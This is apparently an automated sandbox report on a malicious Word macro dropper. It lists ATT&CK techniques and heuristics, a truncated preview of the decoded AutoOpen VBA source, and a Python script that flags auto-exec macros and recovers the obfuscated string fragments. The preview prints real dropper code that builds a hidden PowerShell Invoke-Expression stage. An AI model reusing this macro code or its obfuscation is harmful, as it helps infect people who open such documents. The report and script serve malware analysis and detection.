Verdict: MALICIOUS (Risk Score 242)
Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document whose VBA project defines an AutoOpen procedure, so the macro runs as soon as the document is opened in Word with macros enabled (T1204.002 followed by T1059.005). In the decoded source, AutoOpen is padded with arithmetic on never-assigned variables (dead code that only survives because of On Error Resume Next) and then executes Application.Run "vlVqPWXcmTjQNu", PljXNASELpnrRA: a second macro is invoked by name, which hides the call target from a simple cross-reference of the source, and it receives the return value of PljXNASELpnrRA(). That function assembles its result from Mid() slices of string literals sandwiched between undefined variables (Empty concatenates as an empty string, so only the literal is sliced); the visible slices contain PowerShell-style constructs such as [CHar]50+[CHar]68, .rEpLAce(...) and vERbosE'+'PREFereNce.tOStRING()[1,3], the well-known idiom in which $VerbosePreference.ToString()[1,3] yields the characters "ie" so that an iex (Invoke-Expression) call can be built without writing it literally. Combined with the Shell() call reported by the OLE_VBA_SHELL heuristic (it lies beyond the truncated preview below; confirm it in the full macros.bas artifact), this is the structure of a downloader that launches an obfuscated PowerShell second stage. The ClamAV signature Doc.Dropper.Agent-6447096-0 corroborates the verdict.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6447096-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6447096-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code.
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA. The call is not within the displayed portion of the macro preview below, which is truncated; verify it against the full macros.bas artifact before citing it as the execution primitive.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro. Visible in the preview as Sub AutoOpen(), which Word runs automatically when the document is opened.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat: the rule text says no VBA project was recovered, which is contradicted by the decoded macros.bas artifact below; treat this marker as corroboration of the AutoOpen finding rather than as an independent signal.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier found in ordinary Office files and is not a network indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27773 bytes | 83cb99a363bd745193bff16c61f7256d42600065aec67df3e1582162c9dbd72a |

Preview: first 1,000 lines of the extracted script (the listing below is cut off partway).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "BfBhTlCKChZFpR"
Sub AutoOpen()
On Error Resume Next
qYGOvCiJl = tswQ - Sgn(sJIsULYionrc) - (8488384 - Tan(1125608) / 5478276 - ChrW(qWzGr))
GHAjPqRWZ = KAjjJjuoNSq - Sgn(aDamDJu) - (527874 - Tan(4272490) / 9452459 - ChrW(wlCHL))
FUHLPDjbI = TcwiloBp - Sgn(wGdnHcWNNq) - (7165886 - Tan(9746025) / 1274802 - ChrW(ijsKfCWXw))
Application.Run "vlVqPWXcmTjQNu", PljXNASELpnrRA
dhpRGoLVz = WLFchzisqSkXXM - Sgn(Nzs) - (5628409 - Tan(4258189) / 7416627 - ChrW(ZHzGR))
KQZBVoCkQ = HLLzKjENG - Sgn(dRspT) - (8541530 - Tan(5169051) / 1815108 - ChrW(lzcbhX))
cQRPiUckk = hRZccVusvotXk - Sgn(cNtXifijiZi) - (3040437 - Tan(7502206) / 9636300 - ChrW(pAhIzlaB))
End Sub
Function PljXNASELpnrRA()
On Error Resume Next
aszSXpoEEw = GzWzJFBP - Sgn(nwktBhFvOjuz) - (2965115 - Tan(2846810) / 9205455 - ChrW(rcEPbt))
WEljczzX = SSwc - Sgn(FkzjZD) - (4469749 - Tan(1007875) / 7092848 - ChrW(VhITKF))
DqpmM = Yqlak - Sgn(dzzOtpR) - (5181835 - Tan(855143) / 928743 - ChrW(qdjLZMrqidGWH))
dfwpXBlb = ofnIZzkw + Mid(TdqTvZqCcjEtFl + "qhbLTNGEYKPYTBHar]50+[CHar]68),[STRING][CHa'+'r]96).rEpLAcVQQvPkKOuVl" + tKBVHXONPZoG, 15, 45)
lTFMcrS = oWar - Sgn(KnLh) - (9713011 - Tan(2565982) / 934187 - ChrW(LNYzXNaK))
ruAQSU = ourjCjFubwDN - Sgn(zLiiTcHFT) - (2956932 - Tan(2184518) / 1117317 - ChrW(HcwHfIv))
LNJHGu = hjzZHHFmXPBJjN - Sgn(RouwD) - (7018467 - Tan(4188573) / 5889809 - ChrW(ajYdvUSuRf))
vsJVHonGk = jBGtFrnU + Mid(WmZodPT + "fGwaJiFopipajKZVidnu;OhMSSYZ+SYVAF+VAFZDSYZ+VAF+VAFSYZC =SYZ+SYZ OhuQbzcrWquBPj" + RcQcjVAwitj, 21, 47)
VzCuMmizd = ajcqCzGrBwhifi - Sgn(BQZiVdsiOO) - (339199 - Tan(6312328) / 7094306 - ChrW(RFdOJllY))
bVbEPnzMQ = tDDFnzhwn - Sgn(fqw) - (7390266 - Tan(4492319) / 9589253 - ChrW(iFObAQV))
jqOfLTiB = jqETVwt - Sgn(njbSYEjjP) - (2745304 - Tan(5686538) / 1002345 - ChrW(VSFQoCfKBs))
sPPKVcqZMGE = fiJLUBTvA + Mid(wouPh + "XXFzIBqbz'SYZ+ SMS'+'YZ+SYZr1fzVAF+VAFSMrVAF+VAF + OSYZ+SYZhMNSSYZ+SYZB SYZ+SYZ+ V'+'AF+VAF(SMr.SYZ+SYZexSYZ+dZK+dZKSYZSSYZ+SYZMSYZ+VAF+VAFSYZr+SSYZ+'+'SYZMreSMrSYZ+VAF+VAFSYZ);dZK+dZKfor'+'dKjTlBwQbXbwXXXE" + lKsNMBT, 10, 182)
uwTodKKavz = kvX - Sgn(ULMKlrZ) - (1380616 - Tan(5443737) / 7849395 - ChrW(ASBp))
NiIdBXLJ = iblMZvWSHwK - Sgn(zibqPzQCL) - (7815476 - Tan(3449757) / 7967376 - ChrW(GqzioRk))
fPHtskXXq = qZIKL - Sgn(YpuCojwHwNPkU) - (7225482 - Tan(7629398) / 4603417 - ChrW(JwrSFYkSfaSI))
OofoiXuuhh = imEGciSGmNJG + Mid(fwdYiMmmQkOXwD + "tVZMqFvzRvniLiVMDdZVA'+'F+VAFK+dZKfc in SYZ+SYZVAF+VAFOhSYZ+SdZK+dZKYZMSYZ+SYZADCX){try{OhSYZ+dZK+dZKVAF+VAFSVAF+VAFYZdGDVMYrbRAiElNtQBN" + uNSmnojmAZ, 18, 102)
CRkqWUf = kJGdz - Sgn(ujjRtaHDjnSUN) - (7716005 - Tan(3322681) / 2877939 - ChrW(bvqUTRkcYwF))
oQVvh = TCu - Sgn(wqjWiEwKjSbBGF) - (5490493 - Tan(8759930) / 4124566 - ChrW(fiJZaRwoV))
URXFjibfiDz = CCNlXVOzhs - Sgn(Wzf) - (7706156 - Tan(232176) / 8196634 - ChrW(WSTLfsWMpZ))
CzoPs = SjEDrMQ + Mid(dIYwskSDwwW + "tiDCtLIus'+'aCEdZVAF+VAFKoE'+'mdZK,[chAR]92 -REPLaCedZKL6fdZK,[cVAF+V'+'AFhAR]124)qOS.( tM1vERbosE'+'PREFereNce.tOStRING()[1,3]+dGwZztiJZbJiPtp" + kzOTaTQ, 10, 120)
iIcBiMJzcAt = piPRNmhWKw - Sgn(Elb) - (7900692 - Tan(9976343) / 474664 - ChrW(NdMoprM))
vWOpDiG = jGRGjbTF - Sgn(vwL) - (1710416 - Tan(4220819) / 224991 - ChrW(adZJ))
kdSaLklY = bVqUzAhTAt - Sgn(FqGbFDMZ) - (7231054 - Tan(6255089) / 4875125 - ChrW(DrMrcFNMRCqEk))
wdNYaArcDnl = SaqjRIdEp + Mid(kriLdWIid + "AAMCzwSToiGY'+'dZVAF+VAFK+dZKZtcSYZ+SY'+'Zh{VAF+VAFSYZ+SYZ}SYZVAF+VAF+SdVAF+VAFZK+dZKYZdZK+dZK}SYZ).rEpLAce(([CHar]49+[CHar]10VAF+VAF2+[CHarRDKNzXVjpNYVPdUofwiGOVKFMi" + ZaNSDKqWVOK, 12, 129)
fXVtHA = qiQ - Sgn(wzvYqfluc) - (464088 - Tan(684029) / 8152975 - ChrW(QfqBInJzRhWNW))
WjvSimIq = CSMkXGp - Sgn(YFi) - (7387131 - Tan(1552892) / 8456953 - ChrW(fCKwlpXJAhqHi))
MZkuzGn = SYKUNibPSj - Sgn(GPHlXVfRElf) - (2309039 - Tan(323700
... (truncated)
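The triage the heuristics above describe (auto-exec entry point plus execution tokens) and the string-slicing obfuscation visible in the preview can both be checked mechanically once the VBA source has been extracted. The following script is an added example, not part of the analyzer's report or of the sample: it scans VBA text for auto-exec procedure names, execution tokens and Application.Run targets, and recovers the fragments hidden in Mid(junk + "literal" + junk, start, length) expressions, relying on the VBA rule that a never-assigned Variant is Empty and Empty + "s" is "s". The token lists are assumptions of this example (a starting set, not the analyzer's rules); the sample input is a handful of lines copied from the preview above plus one constructed line.

```python
"""Triage helpers for extracted VBA source (e.g. olevba output).

Added example; the token lists below are this script's own assumptions,
not the analyzer's rule set.
"""
import re
from typing import Dict, List

# Procedure names that Word/Excel run automatically (starting set, not exhaustive).
AUTOEXEC_NAMES = (
    "AutoOpen", "Auto_Open", "AutoExec", "AutoClose", "AutoNew",
    "Document_Open", "Document_Close", "Workbook_Open", "Workbook_Activate",
)
# Tokens that indicate execution, object creation or download capability.
EXEC_TOKENS = (
    "Shell", "WScript.Shell", "CreateObject", "GetObject", "Application.Run",
    "URLDownloadToFile", "powershell", "cmd.exe", "XMLHTTP",
)

_AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+("
    + "|".join(AUTOEXEC_NAMES) + r")\s*\(",
    re.IGNORECASE | re.MULTILINE,
)
# Longest tokens first so "WScript.Shell" wins over the bare "Shell" inside it.
_EXEC_RE = re.compile(
    r"(?<![\w.])("
    + "|".join(re.escape(t) for t in sorted(EXEC_TOKENS, key=len, reverse=True))
    + r")(?!\w)",
    re.IGNORECASE,
)
_RUN_RE = re.compile(r'Application\.Run\s+"([^"]+)"', re.IGNORECASE)
# The slicing pattern used by this sample: Mid(var + "literal" + var, start, length).
_MID_RE = re.compile(
    r'Mid\(\s*\w+\s*\+\s*"((?:[^"]|"")*)"\s*\+\s*\w+\s*,\s*(\d+)\s*,\s*(\d+)\s*\)',
    re.IGNORECASE,
)


def find_autoexec(src: str) -> List[str]:
    """Names of auto-executing procedures declared in the source."""
    return [m.group(1) for m in _AUTOEXEC_RE.finditer(src)]


def find_exec_tokens(src: str) -> List[str]:
    """Distinct execution/download tokens present, lower-cased and sorted."""
    return sorted({m.group(1).lower() for m in _EXEC_RE.finditer(src)})


def run_targets(src: str) -> List[str]:
    """Macro names invoked indirectly through Application.Run "name"."""
    return [m.group(1) for m in _RUN_RE.finditer(src)]


def recover_mid_fragments(src: str) -> List[str]:
    """Evaluate each Mid(junk + "literal" + junk, start, length) statically.

    Undeclared variables are Empty; Empty + string is the string, so only the
    literal is sliced. VBA Mid is 1-based, hence the start - 1.
    """
    out = []
    for m in _MID_RE.finditer(src):
        literal = m.group(1).replace('""', '"')  # VBA doubles quotes to escape them
        start, length = int(m.group(2)), int(m.group(3))
        out.append(literal[start - 1:start - 1 + length])
    return out


def triage(src: str) -> Dict[str, object]:
    """Summarise the findings; 'suspicious' needs an auto-exec entry plus a payload hint."""
    autoexec = find_autoexec(src)
    tokens = find_exec_tokens(src)
    fragments = recover_mid_fragments(src)
    return {
        "autoexec": autoexec,
        "exec_tokens": tokens,
        "run_targets": run_targets(src),
        "recovered_fragments": fragments,
        "suspicious": bool(autoexec and (tokens or fragments)),
    }


# Lines copied from the macro preview of this report (a subset of the listing).
SAMPLE_VBA = """Sub AutoOpen()
On Error Resume Next
qYGOvCiJl = tswQ - Sgn(sJIsULYionrc) - (8488384 - Tan(1125608) / 5478276 - ChrW(qWzGr))
Application.Run "vlVqPWXcmTjQNu", PljXNASELpnrRA
End Sub
Function PljXNASELpnrRA()
On Error Resume Next
dfwpXBlb = ofnIZzkw + Mid(TdqTvZqCcjEtFl + "qhbLTNGEYKPYTBHar]50+[CHar]68),[STRING][CHa'+'r]96).rEpLAcVQQvPkKOuVl" + tKBVHXONPZoG, 15, 45)
End Function
"""
# Constructed line, not from the sample, to show the slicing on readable text.
CONSTRUCTED_VBA = 'x = a + Mid(b + "zzHello, world!zz" + c, 3, 13)'

if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
    print("constructed:", recover_mid_fragments(CONSTRUCTED_VBA))
```

Running it on the copied lines reports AutoOpen as the entry point, Application.Run as the only execution token in that excerpt (the Shell() call sits outside the displayed portion), vlVqPWXcmTjQNu as the indirect target, and the 45-character slice beginning Har]50+[CHar]68) as the first recovered fragment; the remaining Mid() lines in the full macros.bas can be fed through the same function to reconstruct the fragment sequence before the second macro joins them.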